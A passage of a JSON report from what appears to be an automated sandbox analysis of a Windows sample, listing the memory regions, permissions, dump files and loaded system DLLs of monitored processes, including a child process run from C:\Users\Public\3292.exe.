478609408, "type": "region", "version": 1 }, "end_va": 479133695, "entry_point": 0, "filename": null, "id": "region_1071", "name": "private_0x000000001c870000", "norm_filename": null, "region_type": "private_memory", "start_va": 478609408, "timestamp": "00:00:27.921", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001072-addr_0x000007fffffa4000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_114", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092645376, "type": "region", "version": 1 }, "end_va": 8796092653567, "entry_point": 0, "filename": null, "id": "region_1072", "name": "private_0x000007fffffa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092645376, "timestamp": "00:00:27.921", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001139-addr_0x000007ff00290000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_136", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800741888, "type": "region", "version": 1 }, "end_va": 8791800807423, "entry_point": 0, "filename": null, "id": "region_1139", "name": "private_0x000007ff00290000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800741888, "timestamp": "00:00:29.684", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\Public\\3292.exe\" ", "filename": "c:\\users\\public\\3292.exe", "id": "proc_4", "image_name": "3292.exe", "monitor_reason": "child_process", "monitored_id": 4, "origin_monitor_id": 3, "ref_parent_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000004-region_00001077-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_115", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1077", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:28.138", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001078-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_116", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1078", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:28.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1079", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:28.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1080", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:28.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_1081", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:28.141", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001082-addr_0x0000000000170000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_117", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_1082", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:28.141", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001083-addr_0x0000000000360000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_118", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 0, "filename": null, "id": "region_1083", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:00:28.141", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001084-addr_0x0000000000be0000-size_0x000000000001f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_119", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 12451840, "type": "region", "version": 1 }, "end_va": 12578815, "entry_point": 12451840, "filename": "\\Users\\Public\\3292.exe", "id": "region_1084", "name": "3292.exe", "norm_filename": "c:\\users\\public\\3292.exe", "region_type": "memory_mapped_file", "start_va": 12451840, "timestamp": "00:00:28.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1085", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:28.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1086", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:00:28.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1087", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:28.241", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001088-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_120", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1088", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:28.241", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001089-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_121", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1089", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:28.241", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001090-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_122", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1090", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:28.241", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1091", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:28.242", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001092-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_123", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1092", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:28.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1093", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:28.242", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001094-addr_0x00000000005b0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_124", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 6488063, "entry_point": 0, "filename": null, "id": "region_1094", "name": "private_0x00000000005b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5963776, "timestamp": "00:00:28.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953366016, "type": "region", "version": 1 }, "end_va": 1953398783, "entry_point": 1953366016, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1095", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953366016, "timestamp": "00:00:28.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953808383, "entry_point": 1953431552, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1096", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:00:28.308", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953824768, "type": "region", "version": 1 }, "end_va": 1954082815, "entry_point": 1953824768, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1097", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953824768, "timestamp": "00:00:28.315", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001098-addr_0x0000000000780000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_125", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 8912895, "entry_point": 0, "filename": null, "id": "region_1098", "name": "private_0x0000000000780000", "norm_filename": null, "region_type": "private_memory", "start_va": 7864320, "timestamp": "00:00:28.381", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965359104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1099", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:00:28.382", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973354496, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1100", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:00:28.452", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001101-addr_0x0000000076e70000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_126", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_1101", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:00:28.627", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001102-addr_0x0000000076f70000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_127", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_1102", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:00:28.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1103", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:28.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1104", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:00:28.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954877439, "entry_point": 1954545664, "filename": "\\Windows\\SysWOW64\\winspool.drv", "id": "region_1105", "name": "winspool.drv", "norm_filename": "c:\\windows\\syswow64\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:00:28.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1954938880, "type": "region", "version": 1 }, "end_va": 1955143679, "entry_point": 1954938880, "filename": "\\Windows\\SysWOW64\\winmm.dll", "id": "region_1106", "name": "winmm.dll", "norm_filename": "c:\\windows\\syswow64\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1954938880, "timestamp": "00:00:28.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1955201024, "type": "region", "version": 1 }, "end_va": 1955282943, "entry_point": 1955201024, "filename": "\\Windows\\SysWOW64\\msacm32.dll", "id": "region_1107", "name": "msacm32.dll", "norm_filename": "c:\\windows\\syswow64\\msacm32.dll", "region_type": "memory_mapped_file", "start_va": 1955201024, "timestamp": "00:00:28.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960574976, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1108", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:00:28.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960640512, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1109", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:00:28.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961426944, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1110", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:00:28.726", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1963786240, "type": "region", "version": 1 }, "end_va": 1964142591, "entry_point": 1963786240, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1111", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1963786240, "timestamp": "00:00:28.740", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964179456, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1112", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:00:28.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965686784, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1113", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:00:28.849", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1967456256, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1114", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:00:28.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1968898048, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1115", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:00:29.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970143232, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1116", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:00:29.097", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970798592, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1117", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:00:29.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970864128, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1118", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:00:29.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991639040, "type": "region", "version": 1 }, "end_va": 1992224767, "entry_point": 1991639040, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1119", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991639040, "timestamp": "00:00:29.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993867264, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1120", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:00:29.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1121", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:29.262", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1122", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:29.262", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001123-addr_0x0000000000260000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_128", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1123", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:00:29.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 8912896, "type": "region", "version": 1 }, "end_va": 10518527, "entry_point": 0, "filename": null, "id": "region_1124", "name": "pagefile_0x0000000000880000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8912896, "timestamp": "00:00:29.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961033728, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1125", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:00:29.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974468608, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1126", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:00:29.314", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001127-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_129", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1127", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:29.397", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001128-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_130", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1128", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:29.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": 